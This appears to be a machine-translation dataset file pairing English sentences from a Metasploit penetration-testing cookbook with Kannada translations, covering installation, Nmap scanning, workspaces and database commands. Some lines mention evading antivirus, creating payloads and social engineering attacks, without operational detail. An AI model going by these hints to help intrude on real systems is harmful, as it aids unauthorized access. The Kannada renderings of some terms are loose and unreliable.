Cyber-Parallel-Dataset-Indic / kn /Metasploit Penetration Testing Cookbook 3rd Edition_indic_translation.jsonl
| {"en":"Metasploit is a powerful framework for penetration testing.","translation":"ಮೆಟಾಸ್ಪ್ಲಾಯಿಟ್ ಭೇದನ ಪರೀಕ್ಷೆಗಾಗಿ ಒಂದು ಶಕ್ತಿಯುತ ಚೌಕಟ್ಟಾಗಿದೆ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"This book teaches how to use Metasploit.","translation":"ಈ ಪುಸ್ತಕವು ಮೆಟಾಸ್ಪ್ಲಾಯಿಟ್ ಅನ್ನು ಹೇಗೆ ಬಳಸುವುದು ಎಂದು ಕಲಿಸುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"Install Metasploit on your system.","translation":"ನಿಮ್ಮ ಸಿಸ್ಟಂನಲ್ಲಿ ಮೆಟಾಸ್ಪ್ಲಾಯಿಟ್ ಅನ್ನು ಸ್ಥಾಪಿಸಿ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"Penetration testing helps identify vulnerabilities.","translation":"ಭೇದನ ಪರೀಕ್ಷೆಯು ದೌರ್ಬಲ್ಯಗಳನ್ನು ಗುರುತಿಸಲು ಸಹಾಯ ಮಾಡುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"The book covers various penetration testing techniques.","translation":"ಪುಸ್ತಕವು ವಿವಿಧ ಭೇದನ ಪರೀಕ್ಷಾ ತಂತ್ರಗಳನ್ನು ಒಳಗೊಂಡಿದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Metasploit can be used to exploit servers.","translation":"ಮೆಟಾಸ್ಪ್ಲಾಯಿಟ್ ಅನ್ನು ಸರ್ವರ್ಗಳನ್ನು ಶೋಷಿಸಲು ಬಳಸಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Understanding the basics is crucial for security professionals.","translation":"ಭದ್ರತಾ ವೃತ್ತಿಪರರಿಗೆ ಮೂಲಭೂತ ಅಂಶಗಳನ್ನು ಅರ್ಥಮಾಡಿಕೊಳ್ಳುವುದು ಮುಖ್ಯವಾಗಿದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"This edition includes updated information on the latest exploits.","translation":"ಈ ಆವೃತ್ತಿಯು ಇತ್ತೀಚಿನ ಶೋಷಣೆಗಳ ಕುರಿತು ನವೀಕರಿಸಿದ ಮಾಹಿತಿಯನ್ನು ಒಳಗೊಂಡಿದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"The book guides you through setting up a penetration testing lab.","translation":"ಭೇದನ ಪರೀಕ್ಷಾ ಪ್ರಯೋಗಾಲಯವನ್ನು ಹೇಗೆ ಸ್ಥಾಪಿಸುವುದು ಎಂಬುದರ ಕುರಿತು ಪುಸ್ತಕವು ನಿಮಗೆ ಮಾರ್ಗದರ್ಶನ ನೀಡುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Learn how to evade antivirus software.","translation":"ಆಂಟಿವೈರಸ್ ಸಾಫ್ಟ್ವೇರ್ ಅನ್ನು ಹೇಗೆ ತಪ್ಪಿಸುವುದು ಎಂದು ತಿಳಿಯಿರಿ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Exploiting a system requires careful planning.","translation":"ಸಿಸ್ಟಮ್ ಅನ್ನು ಶೋಷಿಸಲು ಎಚ್ಚರಿಕೆಯ ಯೋಜನೆ ಅಗತ್ಯವಿದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"The book explains how to use Meterpreter.","translation":"ಮೀಟರ್ಪ್ರಿಟರ್ ಅನ್ನು ಹೇಗೆ ಬಳಸುವುದು ಎಂದು ಪುಸ್ತಕವು ವಿವರಿಸುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Post-exploitation techniques are essential for advanced testing.","translation":"ಸುಧಾರಿತ ಪರೀಕ್ಷೆಗಾಗಿ ಪೋಸ್ಟ್-ಶೋಷಣೆ ತಂತ್ರಗಳು ಅತ್ಯಗತ್ಯ.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"MSFvenom is a powerful tool for creating payloads.","translation":"MSFvenom ಪೇಲೋಡ್ಗಳನ್ನು ರಚಿಸಲು ಒಂದು ಶಕ್ತಿಯುತ ಸಾಧನವಾಗಿದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Client-side exploitation is a common attack vector.","translation":"ಕ್ಲೈಂಟ್-ಸೈಡ್ ಶೋಷಣೆಯು ಒಂದು ಸಾಮಾನ್ಯ ದಾಳಿಯ ವೆಕ್ಟರ್ ಆಗಿದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"The Social-Engineer Toolkit is useful for social engineering attacks.","translation":"ಸಾಮಾಜಿಕ ಎಂಜಿನಿಯರಿಂಗ್ ದಾಳಿಗಳಿಗೆ ಸಾಮಾಜಿಕ-ಎಂಜಿನಿಯರ್ ಟೂಲ್ಕಿಟ್ ಉಪಯುಕ್ತವಾಗಿದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Building your own modules enhances your skills.","translation":"ನಿಮ್ಮ ಸ್ವಂತ ಮಾಡ್ಯೂಲ್ಗಳನ್ನು ನಿರ್ಮಿಸುವುದು ನಿಮ್ಮ ಕೌಶಲ್ಯಗಳನ್ನು ಹೆಚ್ಚಿಸುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"Wireless network penetration testing is also covered.","translation":"ವೈರ್ಲೆಸ್ ನೆಟ್ವರ್ಕ್ ಭೇದನ ಪರೀಕ್ಷೆಯನ್ನು ಸಹ ಒಳಗೊಂಡಿದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Cloud penetration testing is becoming increasingly important.","translation":"ಮೇಘ ಭೇದನ ಪರೀಕ್ಷೆಯು ಹೆಚ್ಚೆಚ್ಚು ಮುಖ್ಯವಾಗುತ್ತಿದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"This book provides best practices for security professionals.","translation":"ಈ ಪುಸ್ತಕವು ಭದ್ರತಾ ವೃತ್ತಿಪರರಿಗೆ ಉತ್ತಮ ಅಭ್ಯಾಸಗಳನ್ನು ಒದಗಿಸುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Metasploit is a leading penetration-testing tool.","translation":"ಮೆಟಾಸ್ಪ್ಲೋಯಿಟ್ ಒಂದು ಪ್ರಮುಖ ನುಗ್ಗುವಿಕೆ-ಪರೀಕ್ಷಾ ಸಾಧನವಾಗಿದೆ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"Installing Metasploit on macOS is straightforward.","translation":"ಮೆಟಾಸ್ಪ್ಲೋಯಿಟ್ ಅನ್ನು macOS ನಲ್ಲಿ ಸ್ಥಾಪಿಸುವುದು ನೇರವಾಗಿದೆ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"Kali Linux comes with Metasploit preinstalled.","translation":"ಕಾಲಿ ಲಿನಕ್ಸ್ ಮೆಟಾಸ್ಪ್ಲೋಯಿಟ್ನೊಂದಿಗೆ ಪೂರ್ವ-ಸ್ಥಾಪಿತವಾಗಿ ಬರುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"Metasploit has a vast database of exploits.","translation":"ಮೆಟಾಸ್ಪ್ಲೋಯಿಟ್ ವಿನಾಶಕಾರಕ ಕೃತ್ಯಗಳ ದೊಡ್ಡ ಡೇಟಾಬೇಸ್ ಹೊಂದಿದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"An exploit allows access to a vulnerable system.","translation":"ಒಂದು ವಿನಾಶಕಾರಕ ಕೃತ್ಯವು ದುರ್ಬಲ ವ್ಯವಸ್ಥೆಗೆ ಪ್ರವೇಶವನ್ನು ನೀಡುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"The Metasploit Framework is open-source.","translation":"ಮೆಟಾಸ್ಪ್ಲೋಯಿಟ್ ಫ್ರೇಮ್ವರ್ಕ್ ಮುಕ್ತ-ಮೂಲವಾಗಿದೆ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"Modules are the building blocks of Metasploit.","translation":"ಮಾಡ್ಯೂಲ್ಗಳು ಮೆಟಾಸ್ಪ್ಲೋಯಿಟ್ನ ನಿರ್ಮಾಣ ಘಟಕಗಳಾಗಿವೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"The msfconsole interface is very flexible.","translation":"msfconsole ಇಂಟರ್ಫೇಸ್ ಬಹಳ ಹೊಂದಿಕೊಳ್ಳುವಂತಿದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"You can launch exploits using msfconsole.","translation":"ನೀವು msfconsole ಅನ್ನು ಬಳಸಿಕೊಂಡು ವಿನಾಶಕಾರಕ ಕೃತ್ಯಗಳನ್ನು ಪ್ರಾರಂಭಿಸಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"The web interface is available for Metasploit Pro.","translation":"ಮೆಟಾಸ್ಪ್ಲೋಯಿಟ್ ಪ್ರೊಗಾಗಿ ವೆಬ್ ಇಂಟರ್ಫೇಸ್ ಲಭ್ಯವಿದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Download the Metasploit installer from the official website.","translation":"ಅಧಿಕೃತ ವೆಬ್ಸೈಟ್ನಿಂದ ಮೆಟಾಸ್ಪ್ಲೋಯಿಟ್ ಸ್ಥಾಪಕವನ್ನು ಡೌನ್ಲೋಡ್ ಮಾಡಿ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Disable antivirus during Metasploit installation.","translation":"ಮೆಟಾಸ್ಪ್ಲೋಯಿಟ್ ಸ್ಥಾಪನೆಯ ಸಮಯದಲ್ಲಿ ಆಂಟಿವೈರಸ್ ಅನ್ನು ನಿಷ್ಕ್ರಿಯಗೊಳಿಸಿ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"The quick installation script imports the Rapid7 signing key.","translation":"ತ್ವರಿತ ಅನುಸ್ಥಾಪನಾ ಸ್ಕ್ರಿಪ್ಟ್ ರಾಪಿಡ್7 ಸಹಿ ಕೀಲಿಯನ್ನು ಆಮದು ಮಾಡುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"Metasploit integrates into the OS's package management.","translation":"ಮೆಟಾಸ್ಪ್ಲೋಯಿಟ್ OS ನ ಪ್ಯಾಕೇಜ್ ನಿರ್ವಹಣೆಗೆ ಸಂಯೋಜಿಸುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"Use msfconsole to start the Metasploit Framework.","translation":"ಮೆಟಾಸ್ಪ್ಲೋಯಿಟ್ ಫ್ರೇಮ್ವರ್ಕ್ ಅನ್ನು ಪ್ರಾರಂಭಿಸಲು msfconsole ಬಳಸಿ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Kali Linux is popular for penetration testing.","translation":"ಕಾಲಿ ಲಿನಕ್ಸ್ ನುಗ್ಗುವಿಕೆ ಪರೀಕ್ಷೆಗೆ ಜನಪ್ರಿಯವಾಗಿದೆ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"Set up a Metasploit development environment on Kali Linux.","translation":"ಕಾಲಿ ಲಿನಕ್ಸ್ನಲ್ಲಿ ಮೆಟಾಸ್ಪ್ಲೋಯಿಟ್ ಅಭಿವೃದ್ಧಿ ಪರಿಸರವನ್ನು ಹೊಂದಿಸಿ.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"The default username for Kali Linux is root.","translation":"ಕಾಲಿ ಲಿನಕ್ಸ್ನ ಡೀಫಾಲ್ಟ್ ಬಳಕೆದಾರಹೆಸರು ರೂಟ್ ಆಗಿದೆ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"The Metasploit Framework initial setup guides you.","translation":"ಮೆಟಾಸ್ಪ್ಲೋಯಿಟ್ ಫ್ರೇಮ್ವರ್ಕ್ನ ಆರಂಭಿಕ ಸೆಟಪ್ ನಿಮಗೆ ಮಾರ್ಗದರ್ಶನ ನೀಡುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"PostgreSQL is used as the backend database for Metasploit.","translation":"ಮೆಟಾಸ್ಪ್ಲೋಯಿಟ್ಗಾಗಿ PostgreSQL ಅನ್ನು ಬ್ಯಾಕೆಂಡ್ ಡೇಟಾಬೇಸ್ ಆಗಿ ಬಳಸಲಾಗುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"Nmap is a powerful tool for security professionals.","translation":"Nmap ಸುರಕ್ಷತಾ ವೃತ್ತಿಪರರಿಗೆ ಒಂದು ಪ್ರಬಲ ಸಾಧನವಾಗಿದೆ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"You can run Nmap from the command line or within msfconsole.","translation":"ನೀವು Nmap ಅನ್ನು ಕಮಾಂಡ್ ಲೈನ್ನಿಂದ ಅಥವಾ msfconsole ಒಳಗೆ ರನ್ ಮಾಡಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"To import results into the Metasploit database, use the -oX flag.","translation":"ಮೆಟಾಸ್ಪ್ಲೋಯಿಟ್ ಡೇಟಾಬೇಸ್ಗೆ ಫಲಿತಾಂಶಗಳನ್ನು ಆಮದು ಮಾಡಲು, -oX ಫ್ಲ್ಯಾಗ್ ಬಳಸಿ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"The TCP connect scan is the most basic scan type.","translation":"TCP ಸಂಪರ್ಕ ಸ್ಕ್ಯಾನ್ ಅತ್ಯಂತ ಮೂಲಭೂತ ಸ್ಕ್ಯಾನ್ ವಿಧವಾಗಿದೆ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"A TCP connect scan uses the three-way handshake.","translation":"TCP ಸಂಪರ್ಕ ಸ್ಕ್ಯಾನ್ ಮೂರು-ದಾರಿ ಹ್ಯಾಂಡ್ಶೇಕ್ ಅನ್ನು ಬಳಸುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"SYN scans are considered stealth scanning techniques.","translation":"SYN ಸ್ಕ್ಯಾನ್ಗಳನ್ನು ರಹಸ್ಯ ಸ್ಕ್ಯಾನಿಂಗ್ ತಂತ್ರಜ್ಞಾನವೆಂದು ಪರಿಗಣಿಸಲಾಗುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"SYN scans are harder to detect by firewalls.","translation":"SYN ಸ್ಕ್ಯಾನ್ಗಳನ್ನು ಫೈರ್ವಾಲ್ಗಳಿಂದ ಪತ್ತೆಹಚ್ಚುವುದು ಕಷ್ಟ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"The -p parameter specifies the port range to scan.","translation":"-p ಪ್ಯಾರಾಮೀಟರ್ ಸ್ಕ್ಯಾನ್ ಮಾಡಲು ಪೋರ್ಟ್ ಶ್ರೇಣಿಯನ್ನು ನಿರ್ದಿಷ್ಟಪಡಿಸುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"UDP scanning identifies open UDP ports.","translation":"UDP ಸ್ಕ್ಯಾನಿಂಗ್ ತೆರೆದ UDP ಪೋರ್ಟ್ಗಳನ್ನು ಗುರುತಿಸುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"ICMP port unreachable messages indicate a closed port.","translation":"ICMP ಪೋರ್ಟ್ ತಲುಪಲಾಗದ ಸಂದೇಶಗಳು ಮುಚ್ಚಿದ ಪೋರ್ಟ್ ಅನ್ನು ಸೂಚಿಸುತ್ತವೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Nmap provides various scan modes for penetration testing.","translation":"ನುಗ್ಗುವ ಪರೀಕ್ಷೆಗಾಗಿ Nmap ವಿವಿಧ ಸ್ಕ್ಯಾನ್ ವಿಧಾನಗಳನ್ನು ಒದಗಿಸುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Proper knowledge of scan types is recommended for penetration testing.","translation":"ನುಗ್ಗುವ ಪರೀಕ್ಷೆಗಾಗಿ ಸ್ಕ್ಯಾನ್ ಪ್ರಕಾರಗಳ ಬಗ್ಗೆ ಸರಿಯಾದ ಜ್ಞಾನವನ್ನು ಶಿಫಾರಸು ಮಾಡಲಾಗಿದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"The -O option is used for operating system identification.","translation":"-O ಆಯ್ಕೆಯನ್ನು ಆಪರೇಟಿಂಗ್ ಸಿಸ್ಟಮ್ ಗುರುತಿಸುವಿಕೆಗಾಗಿ ಬಳಸಲಾಗುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"Version detection can be added to other scan types using -sV.","translation":"-sV ಬಳಸಿ ಆವೃತ್ತಿ ಪತ್ತೆಹಚ್ಚುವಿಕೆಯನ್ನು ಇತರ ಸ್ಕ್ಯಾನ್ ಪ್ರಕಾರಗಳಿಗೆ ಸೇರಿಸಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"The decoy option (-D) can be used to increase anonymity.","translation":"ಅನಾಮಧೇಯತೆಯನ್ನು ಹೆಚ್ಚಿಸಲು ಡೆಕೋಯ್ ಆಯ್ಕೆಯನ್ನು (-D) ಬಳಸಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"The db_nmap command stores results in the database.","translation":"db_nmap ಆಜ್ಞೆಯು ಡೇಟಾಬೇಸ್ನಲ್ಲಿ ಫಲಿತಾಂಶಗಳನ್ನು ಸಂಗ್ರಹಿಸುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"The Nmap Scripting Engine (NSE) turns Nmap into a vulnerability scanner.","translation":"Nmap ಸ್ಕ್ರಿಪ್ಟಿಂಗ್ ಎಂಜಿನ್ (NSE) Nmap ಅನ್ನು ದುರ್ಬಲತೆ ಸ್ಕ್ಯಾನರ್ ಆಗಿ ಪರಿವರ್ತಿಸುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"complex"} | |
| {"en":"ARP Sweep helps enumerate live hosts on the local network.","translation":"ARP ಸ್ವೀಪ್ ಸ್ಥಳೀಯ ನೆಟ್ವರ್ಕ್ನಲ್ಲಿ ಲೈವ್ ಹೋಸ್ಟ್ಗಳನ್ನು ಎಣಿಸಲು ಸಹಾಯ ಮಾಡುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"The UDP Service Sweeper module detects UDP services.","translation":"UDP ಸೇವಾ ಸ್ವೀಪರ್ ಮಾಡ್ಯೂಲ್ UDP ಸೇವೆಗಳನ್ನು ಪತ್ತೆ ಮಾಡುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"SMB Share Enumeration collects information like share names.","translation":"SMB ಶೇರ್ ಎನ್ಯುಮರೇಶನ್ ಶೇರ್ ಹೆಸರುಗಳಂತಹ ಮಾಹಿತಿಯನ್ನು ಸಂಗ್ರಹಿಸುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"If you want the database to connect every time you launch msfconsole, copy the database configuration file to the .msf4 directory.","translation":"ನೀವು ಪ್ರತಿ ಬಾರಿ msfconsole ಅನ್ನು ಪ್ರಾರಂಭಿಸಿದಾಗ ಡೇಟಾಬೇಸ್ ಸಂಪರ್ಕಿಸಲು ಬಯಸಿದರೆ, ಡೇಟಾಬೇಸ್ ಕಾನ್ಫಿಗರೇಶನ್ ಫೈಲ್ ಅನ್ನು .msf4 ಡೈರೆಕ್ಟರಿಗೆ ನಕಲಿಸಿ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Workspaces in Metasploit are used to separate datasets, allowing you to stay organized.","translation":"ಮೆಟಾಸ್ಪ್ಲೋಯಿಟ್ನಲ್ಲಿನ ವರ್ಕ್ಸ್ಪೇಸ್ಗಳನ್ನು ಡೇಟಾ ಸೆಟ್ಗಳನ್ನು ಪ್ರತ್ಯೇಕಿಸಲು ಬಳಸಲಾಗುತ್ತದೆ, ಇದು ನಿಮಗೆ ಸಂಘಟಿತವಾಗಿರಲು ಅನುಮತಿಸುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"It is a good idea to create a new workspace to organize all your collected data before starting a new penetration test.","translation":"ಹೊಸ ನುಗ್ಗುವಿಕೆ ಪರೀಕ್ಷೆಯನ್ನು ಪ್ರಾರಂಭಿಸುವ ಮೊದಲು ನಿಮ್ಮ ಎಲ್ಲಾ ಸಂಗ್ರಹಿಸಿದ ಡೇಟಾವನ್ನು ಸಂಘಟಿಸಲು ಹೊಸ ಕೆಲಸದ ಸ್ಥಳವನ್ನು ರಚಿಸುವುದು ಒಳ್ಳೆಯದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"The default workspace is selected when connecting to the database, which is represented by the * character before its name.","translation":"ಡೇಟಾಬೇಸ್ಗೆ ಸಂಪರ್ಕಿಸುವಾಗ ಡೀಫಾಲ್ಟ್ ವರ್ಕ್ಸ್ಪೇಸ್ ಅನ್ನು ಆಯ್ಕೆ ಮಾಡಲಾಗುತ್ತದೆ, ಇದನ್ನು ಅದರ ಹೆಸರಿನ ಮೊದಲು * ಅಕ್ಷರದಿಂದ ಪ್ರತಿನಿಧಿಸಲಾಗುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"To display the usage for the workspace command, use the -h option.","translation":"ವರ್ಕ್ಸ್ಪೇಸ್ ಆಜ್ಞೆಗಾಗಿ ಬಳಕೆಯನ್ನು ಪ್ರದರ್ಶಿಸಲು, -h ಆಯ್ಕೆಯನ್ನು ಬಳಸಿ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"To add a new workspace, use the -a option followed by the name of the workspace.","translation":"ಹೊಸ ವರ್ಕ್ಸ್ಪೇಸ್ ಅನ್ನು ಸೇರಿಸಲು, -a ಆಯ್ಕೆಯನ್ನು ಬಳಸಿ ನಂತರ ವರ್ಕ್ಸ್ಪೇಸ್ನ ಹೆಸರನ್ನು ಬಳಸಿ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"To list the available workspaces, simply type the workspace command.","translation":"ಲಭ್ಯವಿರುವ ವರ್ಕ್ಸ್ಪೇಸ್ಗಳನ್ನು ಪಟ್ಟಿ ಮಾಡಲು, ವರ್ಕ್ಸ್ಪೇಸ್ ಆಜ್ಞೆಯನ್ನು ಟೈಪ್ ಮಾಡಿ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"To delete a workspace, use the -d option followed by the name of the workspace.","translation":"ವರ್ಕ್ಸ್ಪೇಸ್ ಅನ್ನು ಅಳಿಸಲು, -d ಆಯ್ಕೆಯನ್ನು ಬಳಸಿ ನಂತರ ವರ್ಕ್ಸ್ಪೇಸ್ನ ಹೆಸರನ್ನು ಬಳಸಿ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"To change the current workspace, use the workspace command followed by the name of the workspace you want to change to.","translation":"ಪ್ರಸ್ತುತ ವರ್ಕ್ಸ್ಪೇಸ್ ಅನ್ನು ಬದಲಾಯಿಸಲು, ವರ್ಕ್ಸ್ಪೇಸ್ ಆಜ್ಞೆಯನ್ನು ಬಳಸಿ ನಂತರ ನೀವು ಬದಲಾಯಿಸಲು ಬಯಸುವ ವರ್ಕ್ಸ್ಪೇಸ್ನ ಹೆಸರನ್ನು ಬಳಸಿ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"To rename a workspace, use the workspace command with the -r option followed by the old workspace name and the new workspace name.","translation":"ವರ್ಕ್ಸ್ಪೇಸ್ ಅನ್ನು ಮರುಹೆಸರಿಸಲು, -r ಆಯ್ಕೆಯೊಂದಿಗೆ ವರ್ಕ್ಸ್ಪೇಸ್ ಆಜ್ಞೆಯನ್ನು ಬಳಸಿ, ಹಳೆಯ ವರ್ಕ್ಸ್ಪೇಸ್ ಹೆಸರು ಮತ್ತು ಹೊಸ ವರ್ಕ್ಸ್ಪೇಸ್ ಹೆಸರನ್ನು ಅನುಸರಿಸಿ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Once the database is configured, we can start using it.","translation":"ಡೇಟಾಬೇಸ್ ಅನ್ನು ಕಾನ್ಫಿಗರ್ ಮಾಡಿದ ನಂತರ, ನಾವು ಅದನ್ನು ಬಳಸಲು ಪ್ರಾರಂಭಿಸಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"First, we will take a look at how to import data from external tools using the db_import command.","translation":"ಮೊದಲಿಗೆ, db_import ಆಜ್ಞೆಯನ್ನು ಬಳಸಿಕೊಂಡು ಬಾಹ್ಯ ಪರಿಕರಗಳಿಂದ ಡೇಟಾವನ್ನು ಹೇಗೆ ಆಮದು ಮಾಡಿಕೊಳ್ಳಬೇಕೆಂದು ನಾವು ನೋಡುತ್ತೇವೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"To test the db_import command, we will use the nmap command, a free security scanner.","translation":"db_import ಆಜ್ಞೆಯನ್ನು ಪರೀಕ್ಷಿಸಲು, ನಾವು ಉಚಿತ ಭದ್ರತಾ ಸ್ಕ್ಯಾನರ್ ಆದ nmap ಆಜ್ಞೆಯನ್ನು ಬಳಸುತ್ತೇವೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Alternatively, you can run the db_nmap command directly from msfconsole, and the results will be saved in your current database.","translation":"ಪರ್ಯಾಯವಾಗಿ, ನೀವು db_nmap ಆಜ್ಞೆಯನ್ನು ನೇರವಾಗಿ msfconsole ನಿಂದ ರನ್ ಮಾಡಬಹುದು, ಮತ್ತು ಫಲಿತಾಂಶಗಳನ್ನು ನಿಮ್ಮ ಪ್ರಸ್ತುತ ಡೇಟಾಬೇಸ್ನಲ್ಲಿ ಉಳಿಸಲಾಗುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Now that we have data in the database, we can start by using the hosts command to display all the hosts stored in our current workspace.","translation":"ಈಗ ನಾವು ಡೇಟಾಬೇಸ್ನಲ್ಲಿ ಡೇಟಾವನ್ನು ಹೊಂದಿದ್ದೇವೆ, ನಮ್ಮ ಪ್ರಸ್ತುತ ವರ್ಕ್ಸ್ಪೇಸ್ನಲ್ಲಿ ಸಂಗ್ರಹವಾಗಿರುವ ಎಲ್ಲಾ ಹೋಸ್ಟ್ಗಳನ್ನು ಪ್ರದರ್ಶಿಸಲು ನಾವು ಹೋಸ್ಟ್ಗಳ ಆಜ್ಞೆಯನ್ನು ಬಳಸುವ ಮೂಲಕ ಪ್ರಾರಂಭಿಸಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
| {"en":"Using the -c option, we can select which columns to display.","translation":"-c ಆಯ್ಕೆಯನ್ನು ಬಳಸಿಕೊಂಡು, ಯಾವ ಕಾಲಮ್ಗಳನ್ನು ಪ್ರದರ್ಶಿಸಬೇಕೆಂದು ನಾವು ಆಯ್ಕೆ ಮಾಡಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"With the -S option, we can search for specific strings, such as the OS name.","translation":"-S ಆಯ್ಕೆಯೊಂದಿಗೆ, OS ಹೆಸರಿನಂತಹ ನಿರ್ದಿಷ್ಟ ಸ್ಟ್ರಿಂಗ್ಗಳನ್ನು ನಾವು ಹುಡುಕಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"The services command allows us to display the services running on the hosts.","translation":"ಸೇವೆಗಳ ಆಜ್ಞೆಯು ಹೋಸ್ಟ್ಗಳಲ್ಲಿ ಚಾಲನೆಯಲ್ಲಿರುವ ಸೇವೆಗಳನ್ನು ಪ್ರದರ್ಶಿಸಲು ನಮಗೆ ಅನುಮತಿಸುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"Using the search command without any options displays all the available services.","translation":"ಯಾವುದೇ ಆಯ್ಕೆಗಳಿಲ್ಲದೆ ಹುಡುಕಾಟ ಆಜ್ಞೆಯನ್ನು ಬಳಸುವುದು ಎಲ್ಲಾ ಲಭ್ಯವಿರುವ ಸೇವೆಗಳನ್ನು ಪ್ರದರ್ಶಿಸುತ್ತದೆ.","target_lang":"kn","domain":"technical","complexity":"simple"} | |
| {"en":"By combining multiple options, you can search just a specific host and only display the columns you want.","translation":"ಬಹು ಆಯ್ಕೆಗಳನ್ನು ಸಂಯೋಜಿಸುವ ಮೂಲಕ, ನೀವು ನಿರ್ದಿಷ್ಟ ಹೋಸ್ಟ್ ಅನ್ನು ಹುಡುಕಬಹುದು ಮತ್ತು ನೀವು ಬಯಸುವ ಕಾಲಮ್ಗಳನ್ನು ಮಾತ್ರ ಪ್ರದರ್ಶಿಸಬಹುದು.","target_lang":"kn","domain":"technical","complexity":"moderate"} | |
